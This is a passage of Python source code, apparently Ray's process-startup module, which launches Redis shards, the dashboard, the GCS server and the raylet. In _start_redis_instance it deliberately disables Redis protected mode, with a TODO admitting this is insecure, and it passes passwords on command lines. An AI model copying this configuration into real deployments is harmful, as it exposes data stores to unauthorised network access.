expires before the node appears in the client table. """ redis_ip_address, redis_port = redis_address.split(":") wait_for_redis_to_start(redis_ip_address, redis_port, redis_password) global_state = ray.state.GlobalState() global_state._initialize_global_state(redis_address, redis_password) start_time = time.time() while time.time() - start_time < timeout: clients = global_state.node_table() object_store_socket_names = [ client["ObjectStoreSocketName"] for client in clients ] if node_plasma_store_socket_name in object_store_socket_names: return else: time.sleep(0.1) raise TimeoutError("Timed out while waiting for node to startup.") def get_node_to_connect_for_driver(redis_address, node_ip_address, redis_password=None): redis_ip_address, redis_port = redis_address.split(":") # Get node table from global state accessor. global_state = ray.state.GlobalState() global_state._initialize_global_state(redis_address, redis_password) return global_state.get_node_to_connect_for_driver(node_ip_address) def get_webui_url_from_redis(redis_client): webui_url = redis_client.hmget("webui", "url")[0] return ray._private.utils.decode( webui_url) if webui_url is not None else None def remaining_processes_alive(): """See if the remaining processes are alive or not. Note that this ignores processes that have been explicitly killed, e.g., via a command like node.kill_raylet(). Returns: True if the remaining processes started by ray.init() are alive and False otherwise. Raises: Exception: An exception is raised if the processes were not started by ray.init(). """ if ray.worker._global_node is None: raise RuntimeError("This process is not in a position to determine " "whether all processes are alive or not.") return ray.worker._global_node.remaining_processes_alive() def validate_redis_address(address): """Validates address parameter. Returns: redis_address: string containing the full <host:port> address. redis_ip: string representing the host portion of the address. redis_port: integer representing the port portion of the address. """ if address == "auto": address = find_redis_address_or_die() redis_address = address_to_ip(address) redis_address_parts = redis_address.split(":") if len(redis_address_parts) != 2: raise ValueError("Malformed address. Expected '<host>:<port>'.") redis_ip = redis_address_parts[0] try: redis_port = int(redis_address_parts[1]) except ValueError: raise ValueError("Malformed address port. Must be an integer.") if redis_port < 1024 or redis_port > 65535: raise ValueError("Invalid address port. Must " "be between 1024 and 65535.") return redis_address, redis_ip, redis_port def address_to_ip(address): """Convert a hostname to a numerical IP addresses in an address. This should be a no-op if address already contains an actual numerical IP address. Args: address: This can be either a string containing a hostname (or an IP address) and a port or it can be just an IP address. Returns: The same address but with the hostname replaced by a numerical IP address. """ address_parts = address.split(":") ip_address = socket.gethostbyname(address_parts[0]) # Make sure localhost isn't resolved to the loopback ip if ip_address == "127.0.0.1": ip_address = get_node_ip_address() return ":".join([ip_address] + address_parts[1:]) def node_ip_address_from_perspective(address): """IP address by which the local node can be reached *from* the `address`. Args: address (str): The IP address and port of any known live service on the network you care about. Returns: The IP address by which the local node can be reached from the address. """ ip_address, port = address.split(":") s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: # This command will raise an exception if there is no internet # connection. s.connect((ip_address, int(port))) node_ip_address = s.getsockname()[0] except OSError as e: node_ip_address = "127.0.0.1" # [Errno 101] Network is unreachable if e.errno == errno.ENETUNREACH: try: # try get node ip address from host name host_name = socket.getfqdn(socket.gethostname()) node_ip_address = socket.gethostbyname(host_name) except Exception: pass finally: s.close() return node_ip_address def get_node_ip_address(address="8.8.8.8:53"): if ray.worker._global_node is not None: return ray.worker._global_node.node_ip_address return node_ip_address_from_perspective(address) def create_redis_client(redis_address, password=None): """Create a Redis client. Args: The IP address, port, and password of the Redis server. Returns: A Redis client. """ redis_ip_address, redis_port = redis_address.split(":") # For this command to work, some other client (on the same machine # as Redis) must have run "CONFIG SET protected-mode no". return redis.StrictRedis( host=redis_ip_address, port=int(redis_port), password=password) def start_ray_process(command, process_type, fate_share, env_updates=None, cwd=None, use_valgrind=False, use_gdb=False, use_valgrind_profiler=False, use_perftools_profiler=False, use_tmux=False, stdout_file=None, stderr_file=None, pipe_stdin=False): """Start one of the Ray processes. TODO(rkn): We need to figure out how these commands interact. For example, it may only make sense to start a process in gdb if we also start it in tmux. Similarly, certain combinations probably don't make sense, like simultaneously running the process in valgrind and the profiler. Args: command (List[str]): The command to use to start the Ray process. process_type (str): The type of the process that is being started (e.g., "raylet"). fate_share: If true, the child will be killed if its parent (us) dies. True must only be passed after detection of this functionality. env_updates (dict): A dictionary of additional environment variables to run the command with (in addition to the caller's environment variables). cwd (str): The directory to run the process in. use_valgrind (bool): True if we should start the process in valgrind. use_gdb (bool): True if we should start the process in gdb. use_valgrind_profiler (bool): True if we should start the process in the valgrind profiler. use_perftools_profiler (bool): True if we should profile the process using perftools. use_tmux (bool): True if we should start the process in tmux. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. pipe_stdin: If true, subprocess.PIPE will be passed to the process as stdin. Returns: Information about the process that was started including a handle to the process that was started. """ # Detect which flags are set through environment variables. valgrind_env_var = f"RAY_{process_type.upper()}_VALGRIND" if os.environ.get(valgrind_env_var) == "1": logger.info("Detected environment variable '%s'.", valgrind_env_var) use_valgrind = True valgrind_profiler_env_var = f"RAY_{process_type.upper()}_VALGRIND_PROFILER" if os.environ.get(valgrind_profiler_env_var) == "1": logger.info("Detected environment variable '%s'.", valgrind_profiler_env_var) use_valgrind_profiler = True perftools_profiler_env_var = (f"RAY_{process_type.upper()}" "_PERFTOOLS_PROFILER") if os.environ.get(perftools_profiler_env_var) == "1": logger.info("Detected environment variable '%s'.", perftools_profiler_env_var) use_perftools_profiler = True tmux_env_var = f"RAY_{process_type.upper()}_TMUX" if os.environ.get(tmux_env_var) == "1": logger.info("Detected environment variable '%s'.", tmux_env_var) use_tmux = True gdb_env_var = f"RAY_{process_type.upper()}_GDB" if os.environ.get(gdb_env_var) == "1": logger.info("Detected environment variable '%s'.", gdb_env_var) use_gdb = True if sum([ use_gdb, use_valgrind, use_valgrind_profiler, use_perftools_profiler, ]) > 1: raise ValueError( "At most one of the 'use_gdb', 'use_valgrind', " "'use_valgrind_profiler', and 'use_perftools_profiler' flags can " "be used at a time.") if env_updates is None: env_updates = {} if not isinstance(env_updates, dict): raise ValueError("The 'env_updates' argument must be a dictionary.") modified_env = os.environ.copy() modified_env.update(env_updates) if use_gdb: if not use_tmux: raise ValueError( "If 'use_gdb' is true, then 'use_tmux' must be true as well.") # TODO(suquark): Any better temp file creation here? gdb_init_path = os.path.join(ray._private.utils.get_ray_temp_dir(), f"gdb_init_{process_type}_{time.time()}") ray_process_path = command[0] ray_process_args = command[1:] run_args = " ".join(["'{}'".format(arg) for arg in ray_process_args]) with open(gdb_init_path, "w") as gdb_init_file: gdb_init_file.write(f"run {run_args}") command = ["gdb", ray_process_path, "-x", gdb_init_path] if use_valgrind: command = [ "valgrind", "--track-origins=yes", "--leak-check=full", "--show-leak-kinds=all", "--leak-check-heuristics=stdstring", "--error-exitcode=1", ] + command if use_valgrind_profiler: command = ["valgrind", "--tool=callgrind"] + command if use_perftools_profiler: modified_env["LD_PRELOAD"] = os.environ["PERFTOOLS_PATH"] modified_env["CPUPROFILE"] = os.environ["PERFTOOLS_LOGFILE"] if use_tmux: # The command has to be created exactly as below to ensure that it # works on all versions of tmux. (Tested with tmux 1.8-5, travis' # version, and tmux 2.1) command = ["tmux", "new-session", "-d", f"{" ".join(command)}"] if fate_share: assert ray._private.utils.detect_fate_sharing_support(), ( "kernel-level fate-sharing must only be specified if " "detect_fate_sharing_support() has returned True") def preexec_fn(): import signal signal.pthread_sigmask(signal.SIG_BLOCK, {signal.SIGINT}) if fate_share and sys.platform.startswith("linux"): ray._private.utils.set_kill_on_parent_death_linux() win32_fate_sharing = fate_share and sys.platform == "win32" # With Windows fate-sharing, we need special care: # The process must be added to the job before it is allowed to execute. # Otherwise, there's a race condition: the process might spawn children # before the process itself is assigned to the job. # After that point, its children will not be added to the job anymore. CREATE_SUSPENDED = 0x00000004 # from Windows headers process = ConsolePopen( command, env=modified_env, cwd=cwd, stdout=stdout_file, stderr=stderr_file, stdin=subprocess.PIPE if pipe_stdin else None, preexec_fn=preexec_fn if sys.platform != "win32" else None, creationflags=CREATE_SUSPENDED if win32_fate_sharing else 0) if win32_fate_sharing: try: ray._private.utils.set_kill_child_on_death_win32(process) psutil.Process(process.pid).resume() except (psutil.Error, OSError): process.kill() raise def _get_stream_name(stream): if stream is not None: try: return stream.name except AttributeError: return str(stream) return None return ProcessInfo( process=process, stdout_file=_get_stream_name(stdout_file), stderr_file=_get_stream_name(stderr_file), use_valgrind=use_valgrind, use_gdb=use_gdb, use_valgrind_profiler=use_valgrind_profiler, use_perftools_profiler=use_perftools_profiler, use_tmux=use_tmux) def wait_for_redis_to_start(redis_ip_address, redis_port, password=None): """Wait for a Redis server to be available. This is accomplished by creating a Redis client and sending a random command to the server until the command gets through. Args: redis_ip_address (str): The IP address of the redis server. redis_port (int): The port of the redis server. password (str): The password of the redis server. Raises: Exception: An exception is raised if we could not connect with Redis. """ redis_client = redis.StrictRedis( host=redis_ip_address, port=redis_port, password=password) # Wait for the Redis server to start. num_retries = ray_constants.START_REDIS_WAIT_RETRIES delay = 0.001 for i in range(num_retries): try: # Run some random command and see if it worked. logger.debug( "Waiting for redis server at {}:{} to respond...".format( redis_ip_address, redis_port)) redis_client.client_list() # If the Redis service is delayed getting set up for any reason, we may # get a redis.ConnectionError: Error 111 connecting to host:port. # Connection refused. # Unfortunately, redis.ConnectionError is also the base class of # redis.AuthenticationError. We *don't* want to obscure a # redis.AuthenticationError, because that indicates the user provided a # bad password. Thus a double except clause to ensure a # redis.AuthenticationError isn't trapped here. except redis.AuthenticationError as authEx: raise RuntimeError("Unable to connect to Redis at {}:{}.".format( redis_ip_address, redis_port)) from authEx except redis.ConnectionError as connEx: if i >= num_retries - 1: raise RuntimeError( f"Unable to connect to Redis at {redis_ip_address}:" f"{redis_port} after {num_retries} retries. Check that " f"{redis_ip_address}:{redis_port} is reachable from this " "machine. If it is not, your firewall may be blocking " "this port. If the problem is a flaky connection, try " "setting the environment variable " "`RAY_START_REDIS_WAIT_RETRIES` to increase the number of" " attempts to ping the Redis server.") from connEx # Wait a little bit. time.sleep(delay) delay *= 2 else: break else: raise RuntimeError( f"Unable to connect to Redis (after {num_retries} retries). " "If the Redis instance is on a different machine, check that " "your firewall and relevant Ray ports are configured properly. " "You can also set the environment variable " "`RAY_START_REDIS_WAIT_RETRIES` to increase the number of " "attempts to ping the Redis server.") def _compute_version_info(): """Compute the versions of Python, and Ray. Returns: A tuple containing the version information. """ ray_version = ray.__version__ python_version = ".".join(map(str, sys.version_info[:3])) return ray_version, python_version def _put_version_info_in_redis(redis_client): """Store version information in Redis. This will be used to detect if workers or drivers are started using different versions of Python, or Ray. Args: redis_client: A client for the primary Redis shard. """ redis_client.set("VERSION_INFO", json.dumps(_compute_version_info())) def check_version_info(redis_client): """Check if various version info of this process is correct. This will be used to detect if workers or drivers are started using different versions of Python, or Ray. If the version information is not present in Redis, then no check is done. Args: redis_client: A client for the primary Redis shard. Raises: Exception: An exception is raised if there is a version mismatch. """ redis_reply = redis_client.get("VERSION_INFO") # Don't do the check if there is no version information in Redis. This # is to make it easier to do things like start the processes by hand. if redis_reply is None: return true_version_info = tuple( json.loads(ray._private.utils.decode(redis_reply))) version_info = _compute_version_info() if version_info != true_version_info: node_ip_address = get_node_ip_address() error_message = ("Version mismatch: The cluster was started with:\n" " Ray: " + true_version_info[0] + "\n" " Python: " + true_version_info[1] + "\n" "This process on node " + node_ip_address + " was started with:" + "\n" " Ray: " + version_info[0] + "\n" " Python: " + version_info[1] + "\n") if version_info[:2] != true_version_info[:2]: raise RuntimeError(error_message) else: logger.warning(error_message) def start_reaper(fate_share=None): """Start the reaper process. This is a lightweight process that simply waits for its parent process to die and then terminates its own process group. This allows us to ensure that ray processes are always terminated properly so long as that process itself isn't SIGKILLed. Returns: ProcessInfo for the process that was started. """ # Make ourselves a process group leader so that the reaper can clean # up other ray processes without killing the process group of the # process that started us. try: if sys.platform != "win32": os.setpgrp() except OSError as e: errcode = e.errno if errcode == errno.EPERM and os.getpgrp() == os.getpid(): # Nothing to do; we're already a session leader. pass else: logger.warning("setpgrp failed, processes may not be " "cleaned up properly: {}.".format(e)) # Don't start the reaper in this case as it could result in killing # other user processes. return None reaper_filepath = os.path.join(RAY_PATH, RAY_PRIVATE_DIR, "ray_process_reaper.py") command = [sys.executable, "-u", reaper_filepath] process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_REAPER, pipe_stdin=True, fate_share=fate_share) return process_info def start_redis(node_ip_address, redirect_files, resource_spec, port=None, redis_shard_ports=None, num_redis_shards=1, redis_max_clients=None, redirect_worker_output=False, password=None, fate_share=None, external_addresses=None, port_denylist=None): """Start the Redis global state store. Args: node_ip_address: The IP address of the current node. This is only used for recording the log filenames in Redis. redirect_files: The list of (stdout, stderr) file pairs. resource_spec (ResourceSpec): Resources for the node. port (int): If provided, the primary Redis shard will be started on this port. redis_shard_ports: A list of the ports to use for the non-primary Redis shards. num_redis_shards (int): If provided, the number of Redis shards to start, in addition to the primary one. The default value is one shard. redis_max_clients: If this is provided, Ray will attempt to configure Redis with this maxclients number. redirect_worker_output (bool): True if worker output should be redirected to a file and false otherwise. Workers will have access to this value when they start up. password (str): Prevents external clients without the password from connecting to Redis if provided. port_denylist (set): A set of denylist ports that shouldn't be used when allocating a new port. Returns: A tuple of the address for the primary Redis shard, a list of addresses for the remaining shards, and the processes that were started. """ if len(redirect_files) != 1 + num_redis_shards: raise ValueError("The number of redirect file pairs should be equal " "to the number of redis shards (including the " "primary shard) we will start.") if redis_shard_ports is None: redis_shard_ports = num_redis_shards * [None] elif len(redis_shard_ports) != num_redis_shards: raise RuntimeError("The number of Redis shard ports does not match " "the number of Redis shards.") processes = [] if external_addresses is not None: primary_redis_address = external_addresses[0] [primary_redis_ip, port] = primary_redis_address.split(":") port = int(port) redis_address = address(primary_redis_ip, port) primary_redis_client = create_redis_client( "%s:%s" % (primary_redis_ip, port), password=password) # Deleting the key to avoid duplicated rpush. primary_redis_client.delete("RedisShards") else: redis_executable = REDIS_EXECUTABLE redis_modules = [REDIS_MODULE] redis_stdout_file, redis_stderr_file = redirect_files[0] # If no port is given, fallback to default Redis port for the primary # shard. if port is None: port = ray_constants.DEFAULT_PORT num_retries = 20 else: num_retries = 1 # Start the primary Redis shard. port, p = _start_redis_instance( redis_executable, modules=redis_modules, port=port, password=password, redis_max_clients=redis_max_clients, num_retries=num_retries, # Below we use None to indicate no limit on the memory of the # primary Redis shard. redis_max_memory=None, stdout_file=redis_stdout_file, stderr_file=redis_stderr_file, fate_share=fate_share, port_denylist=port_denylist) processes.append(p) redis_address = address(node_ip_address, port) primary_redis_client = redis.StrictRedis( host=node_ip_address, port=port, password=password) # Register the number of Redis shards in the primary shard, so that clients # know how many redis shards to expect under RedisShards. primary_redis_client.set("NumRedisShards", str(num_redis_shards)) # Put the redirect_worker_output bool in the Redis shard so that workers # can access it and know whether or not to redirect their output. primary_redis_client.set("RedirectOutput", 1 if redirect_worker_output else 0) # Init job counter to GCS. primary_redis_client.set("JobCounter", 0) # Store version information in the primary Redis shard. _put_version_info_in_redis(primary_redis_client) # Calculate the redis memory. assert resource_spec.resolved() redis_max_memory = resource_spec.redis_max_memory # Start other Redis shards. Each Redis shard logs to a separate file, # prefixed by "redis-<shard number>". redis_shards = [] # If Redis shard ports are not provided, start the port range of the # other Redis shards at a high, random port. last_shard_port = new_port(denylist=port_denylist) - 1 for i in range(num_redis_shards): if external_addresses is not None and len(external_addresses) > 1: shard_address = external_addresses[i + 1] else: redis_stdout_file, redis_stderr_file = redirect_files[i + 1] redis_executable = REDIS_EXECUTABLE redis_modules = [REDIS_MODULE] redis_shard_port = redis_shard_ports[i] # If no shard port is given, try to start this shard's Redis # instance on the port right after the last shard's port. if redis_shard_port is None: redis_shard_port = last_shard_port + 1 num_retries = 20 else: num_retries = 1 redis_shard_port, p = _start_redis_instance( redis_executable, modules=redis_modules, port=redis_shard_port, password=password, redis_max_clients=redis_max_clients, num_retries=num_retries, redis_max_memory=redis_max_memory, stdout_file=redis_stdout_file, stderr_file=redis_stderr_file, fate_share=fate_share, port_denylist=port_denylist) processes.append(p) shard_address = address(node_ip_address, redis_shard_port) last_shard_port = redis_shard_port redis_shards.append(shard_address) # Store redis shard information in the primary redis shard. primary_redis_client.rpush("RedisShards", shard_address) return redis_address, redis_shards, processes def _start_redis_instance(executable, modules, port, redis_max_clients=None, num_retries=20, stdout_file=None, stderr_file=None, password=None, redis_max_memory=None, fate_share=None, port_denylist=None): """Start a single Redis server. Notes: We will initially try to start the Redis instance at the given port, and then try at most `num_retries - 1` times to start the Redis instance at successive random ports. Args: executable (str): Full path of the redis-server executable. modules (list of str): A list of pathnames, pointing to the redis module(s) that will be loaded in this redis server. port (int): Try to start a Redis server at this port. redis_max_clients: If this is provided, Ray will attempt to configure Redis with this maxclients number. num_retries (int): The number of times to attempt to start Redis at successive ports. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. password (str): Prevents external clients without the password from connecting to Redis if provided. redis_max_memory: The max amount of memory (in bytes) to allow redis to use, or None for no limit. Once the limit is exceeded, redis will start LRU eviction of entries. port_denylist (set): A set of denylist ports that shouldn't be used when allocating a new port. Returns: A tuple of the port used by Redis and ProcessInfo for the process that was started. If a port is passed in, then the returned port value is the same. Raises: Exception: An exception is raised if Redis could not be started. """ assert os.path.isfile(executable) for module in modules: assert os.path.isfile(module) counter = 0 load_module_args = [] for module in modules: load_module_args += ["--loadmodule", module] while counter < num_retries: # Construct the command to start the Redis server. command = [executable] if password: if " " in password: raise ValueError("Spaces not permitted in redis password.") command += ["--requirepass", password] command += ( ["--port", str(port), "--loglevel", "warning"] + load_module_args) process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_REDIS_SERVER, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) time.sleep(0.1) # Check if Redis successfully started (or at least if it the executable # did not exit within 0.1 seconds). if process_info.process.poll() is None: break port = new_port(denylist=port_denylist) counter += 1 if counter == num_retries: raise RuntimeError("Couldn't start Redis. " "Check log files: {} {}".format( stdout_file.name if stdout_file is not None else "<stdout>", stderr_file.name if stdout_file is not None else "<stderr>")) # Create a Redis client just for configuring Redis. redis_client = redis.StrictRedis( host="127.0.0.1", port=port, password=password) # Wait for the Redis server to start. wait_for_redis_to_start("127.0.0.1", port, password=password) # Configure Redis to generate keyspace notifications. TODO(rkn): Change # this to only generate notifications for the export keys. redis_client.config_set("notify-keyspace-events", "Kl") # Configure Redis to not run in protected mode so that processes on other # hosts can connect to it. TODO(rkn): Do this in a more secure way. redis_client.config_set("protected-mode", "no") # Discard old task and object metadata. if redis_max_memory is not None: redis_client.config_set("maxmemory", str(redis_max_memory)) redis_client.config_set("maxmemory-policy", "allkeys-lru") redis_client.config_set("maxmemory-samples", "10") logger.debug("Starting Redis shard with {} GB max memory.".format( round(redis_max_memory / 1e9, 2))) # If redis_max_clients is provided, attempt to raise the number of maximum # number of Redis clients. if redis_max_clients is not None: redis_client.config_set("maxclients", str(redis_max_clients)) elif resource is not None: # If redis_max_clients is not provided, determine the current ulimit. # We will use this to attempt to raise the maximum number of Redis # clients. current_max_clients = int( redis_client.config_get("maxclients")["maxclients"]) # The below command should be the same as doing ulimit -n. ulimit_n = resource.getrlimit(resource.RLIMIT_NOFILE)[0] # The quantity redis_client_buffer appears to be the required buffer # between the maximum number of redis clients and ulimit -n. That is, # if ulimit -n returns 10000, then we can set maxclients to # 10000 - redis_client_buffer. redis_client_buffer = 32 if current_max_clients < ulimit_n - redis_client_buffer: redis_client.config_set("maxclients", ulimit_n - redis_client_buffer) # Increase the hard and soft limits for the redis client pubsub buffer to # 128MB. This is a hack to make it less likely for pubsub messages to be # dropped and for pubsub connections to therefore be killed. cur_config = (redis_client.config_get("client-output-buffer-limit")[ "client-output-buffer-limit"]) cur_config_list = cur_config.split() assert len(cur_config_list) == 12 cur_config_list[8:] = ["pubsub", "134217728", "134217728", "60"] redis_client.config_set("client-output-buffer-limit", " ".join(cur_config_list)) # Put a time stamp in Redis to indicate when it was started. redis_client.set("redis_start_time", time.time()) return port, process_info def start_log_monitor(redis_address, logs_dir, stdout_file=None, stderr_file=None, redis_password=None, fate_share=None, max_bytes=0, backup_count=0): """Start a log monitor process. Args: redis_address (str): The address of the Redis instance. logs_dir (str): The directory of logging files. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. redis_password (str): The password of the redis server. max_bytes (int): Log rotation parameter. Corresponding to RotatingFileHandler's maxBytes. backup_count (int): Log rotation parameter. Corresponding to RotatingFileHandler's backupCount. Returns: ProcessInfo for the process that was started. """ log_monitor_filepath = os.path.join(RAY_PATH, RAY_PRIVATE_DIR, "log_monitor.py") command = [ sys.executable, "-u", log_monitor_filepath, f"--redis-address={redis_address}", f"--logs-dir={logs_dir}", f"--logging-rotate-bytes={max_bytes}", f"--logging-rotate-backup-count={backup_count}" ] if redis_password: command += ["--redis-password", redis_password] process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_LOG_MONITOR, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) return process_info def start_dashboard(require_dashboard, host, redis_address, temp_dir, logdir, port=None, stdout_file=None, stderr_file=None, redis_password=None, fate_share=None, max_bytes=0, backup_count=0): """Start a dashboard process. Args: require_dashboard (bool): If true, this will raise an exception if we fail to start the dashboard. Otherwise it will print a warning if we fail to start the dashboard. host (str): The host to bind the dashboard web server to. port (str): The port to bind the dashboard web server to. Defaults to 8265. redis_address (str): The address of the Redis instance. temp_dir (str): The temporary directory used for log files and information for this Ray session. logdir (str): The log directory used to generate dashboard log. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. redis_password (str): The password of the redis server. max_bytes (int): Log rotation parameter. Corresponding to RotatingFileHandler's maxBytes. backup_count (int): Log rotation parameter. Corresponding to RotatingFileHandler's backupCount. Returns: ProcessInfo for the process that was started. """ try: # Make sure port is available. if port is None: port_retries = 50 port = ray_constants.DEFAULT_DASHBOARD_PORT else: port_retries = 0 port_test_socket = socket.socket() port_test_socket.setsockopt( socket.SOL_SOCKET, socket.SO_REUSEADDR, 1, ) try: port_test_socket.bind((host, port)) port_test_socket.close() except socket.error as e: if e.errno in {48, 98}: # address already in use. raise ValueError( f"Failed to bind to {host}:{port} because it's " "already occupied. You can use `ray start " "--dashboard-port ...` or `ray.init(dashboard_port=..." ")` to select a different port.") else: raise e # Make sure the process can start. try: import aiohttp # noqa: F401 import aioredis # noqa: F401 import aiohttp_cors # noqa: F401 import grpc # noqa: F401 except ImportError: warning_message = ( "Not all Ray Dashboard dependencies were found. " "In Ray 1.4+, the Ray CLI, autoscaler, and dashboard will " "only be usable via `pip install 'ray[default]'`. Please " "update your install command.") raise ImportError(warning_message) # Start the dashboard process. dashboard_dir = "new_dashboard" dashboard_filepath = os.path.join(RAY_PATH, dashboard_dir, "dashboard.py") command = [ sys.executable, "-u", dashboard_filepath, f"--host={host}", f"--port={port}", f"--port-retries={port_retries}", f"--redis-address={redis_address}", f"--temp-dir={temp_dir}", f"--log-dir={logdir}", f"--logging-rotate-bytes={max_bytes}", f"--logging-rotate-backup-count={backup_count}" ] if redis_password: command += ["--redis-password", redis_password] process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_DASHBOARD, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) # Retrieve the dashboard url redis_client = ray._private.services.create_redis_client( redis_address, redis_password) dashboard_url = None dashboard_returncode = None for _ in range(200): dashboard_url = redis_client.get(ray_constants.REDIS_KEY_DASHBOARD) if dashboard_url is not None: dashboard_url = dashboard_url.decode("utf-8") break dashboard_returncode = process_info.process.poll() if dashboard_returncode is not None: break # This is often on the critical path of ray.init() and ray start, # so we need to poll often. time.sleep(0.1) if dashboard_url is None: dashboard_log = os.path.join(logdir, "dashboard.log") returncode_str = (f", return code {dashboard_returncode}" if dashboard_returncode is not None else "") # Read last n lines of dashboard log. The log file may be large. n = 10 lines = [] try: with open(dashboard_log, "rb") as f: with mmap.mmap( f.fileno(), 0, access=mmap.ACCESS_READ) as mm: end = mm.size() for _ in range(n): sep = mm.rfind(b"\n", 0, end - 1) if sep == -1: break lines.append(mm[sep + 1:end].decode("utf-8")) end = sep lines.append(f" The last {n} lines of {dashboard_log}:") except Exception as e: raise Exception(f"Failed to read dashbord log: {e}") last_log_str = "\n".join(reversed(lines[-n:])) raise Exception("Failed to start the dashboard" f"{returncode_str}.{last_log_str}") logger.info("View the Ray dashboard at %s%shttp://%s%s%s", colorama.Style.BRIGHT, colorama.Fore.GREEN, dashboard_url, colorama.Fore.RESET, colorama.Style.NORMAL) return dashboard_url, process_info except Exception as e: if require_dashboard: raise e from e else: logger.error(f"Failed to start the dashboard: {e}") return None, None def start_gcs_server(redis_address, stdout_file=None, stderr_file=None, redis_password=None, config=None, fate_share=None, gcs_server_port=None, metrics_agent_port=None, node_ip_address=None): """Start a gcs server. Args: redis_address (str): The address that the Redis server is listening on. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. redis_password (str): The password of the redis server. config (dict|None): Optional configuration that will override defaults in RayConfig. gcs_server_port (int): Port number of the gcs server. metrics_agent_port(int): The port where metrics agent is bound to. node_ip_address(str): IP Address of a node where gcs server starts. Returns: ProcessInfo for the process that was started. """ gcs_ip_address, gcs_port = redis_address.split(":") redis_password = redis_password or "" config_str = serialize_config(config) if gcs_server_port is None: gcs_server_port = 0 command = [ GCS_SERVER_EXECUTABLE, f"--redis_address={gcs_ip_address}", f"--redis_port={gcs_port}", f"--config_list={config_str}", f"--gcs_server_port={gcs_server_port}", f"--metrics-agent-port={metrics_agent_port}", f"--node-ip-address={node_ip_address}", ] if redis_password: command += [f"--redis_password={redis_password}"] process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_GCS_SERVER, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) return process_info def start_raylet(redis_address, node_ip_address, node_manager_port, raylet_name, plasma_store_name, worker_path, setup_worker_path, worker_setup_hook, runtime_env_setup_hook, temp_dir, session_dir, resource_dir, log_dir, resource_spec, plasma_directory, object_store_memory, min_worker_port=None, max_worker_port=None, worker_port_list=None, object_manager_port=None, redis_password=None, metrics_agent_port=None, metrics_export_port=None, use_valgrind=False, use_profiler=False, stdout_file=None, stderr_file=None, config=None, huge_pages=False, fate_share=None, socket_to_use=None, start_initial_python_workers_for_first_job=False, max_bytes=0, backup_count=0): """Start a raylet, which is a combined local scheduler and object manager. Args: redis_address (str): The address of the primary Redis server. node_ip_address (str): The IP address of this node. node_manager_port(int): The port to use for the node manager. If it's 0, a random port will be used. raylet_name (str): The name of the raylet socket to create. plasma_store_name (str): The name of the plasma store socket to connect to. worker_path (str): The path of the Python file that new worker processes will execute. setup_worker_path (str): The path of the Python file that will run worker_setup_hook to set up the environment for the worker process. worker_setup_hook (str): The module path to a Python function that will be imported and run to set up the environment for the worker. runtime_env_setup_hook (str): The module path to a Python function that will be imported and run to set up the runtime env in agent. temp_dir (str): The path of the temporary directory Ray will use. session_dir (str): The path of this session. resource_dir(str): The path of resource of this session . log_dir (str): The path of the dir where log files are created. resource_spec (ResourceSpec): Resources for this raylet. object_manager_port: The port to use for the object manager. If this is None, then the object manager will choose its own port. min_worker_port (int): The lowest port number that workers will bind on. If not set, random ports will be chosen. max_worker_port (int): The highest port number that workers will bind on. If set, min_worker_port must also be set. redis_password: The password to use when connecting to Redis. metrics_agent_port(int): The port where metrics agent is bound to. metrics_export_port(int): The port at which metrics are exposed to. use_valgrind (bool): True if the raylet should be started inside of valgrind. If this is True, use_profiler must be False. use_profiler (bool): True if the raylet should be started inside a profiler. If this is True, use_valgrind must be False. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. tracing_startup_hook: Tracing startup hook. config (dict|None): Optional Raylet configuration that will override defaults in RayConfig. max_bytes (int): Log rotation parameter. Corresponding to RotatingFileHandler's maxBytes. backup_count (int): Log rotation parameter. Corresponding to RotatingFileHandler's backupCount. Returns: ProcessInfo for the process that was started. """ assert node_manager_port is not None and type(node_manager_port) == int if use_valgrind and use_profiler: raise ValueError("Cannot use valgrind and profiler at the same time.") assert resource_spec.resolved() static_resources = resource_spec.to_resource_dict() # Limit the number of workers that can be started in parallel by the # raylet. However, make sure it is at least 1. num_cpus_static = static_resources.get("CPU", 0) maximum_startup_concurrency = max( 1, min(multiprocessing.cpu_count(), num_cpus_static)) # Format the resource argument in a form like 'CPU,1.0,GPU,0,Custom,3'. resource_argument = ",".join( ["{},{}".format(*kv) for kv in static_resources.items()]) gcs_ip_address, gcs_port = redis_address.split(":") has_java_command = False if shutil.which("java") is not None: has_java_command = True ray_java_installed = False try: jars_dir = get_ray_jars_dir() if os.path.exists(jars_dir): ray_java_installed = True except Exception: pass include_java = has_java_command and ray_java_installed if include_java is True: java_worker_command = build_java_worker_command( redis_address, plasma_store_name, raylet_name, redis_password, session_dir, node_ip_address, ) else: java_worker_command = [] if os.path.exists(DEFAULT_WORKER_EXECUTABLE): cpp_worker_command = build_cpp_worker_command( "", redis_address, plasma_store_name, raylet_name, redis_password, session_dir, log_dir, node_ip_address) else: cpp_worker_command = [] # Create the command that the Raylet will use to start workers. # TODO(architkulkarni): Pipe in setup worker args separately instead of # inserting them into start_worker_command and later erasing them if # needed. start_worker_command = [ sys.executable, setup_worker_path, f"--worker-setup-hook={worker_setup_hook}", f"--session-dir={session_dir}", worker_path, f"--node-ip-address={node_ip_address}", "--node-manager-port=RAY_NODE_MANAGER_PORT_PLACEHOLDER", f"--object-store-name={plasma_store_name}", f"--raylet-name={raylet_name}", 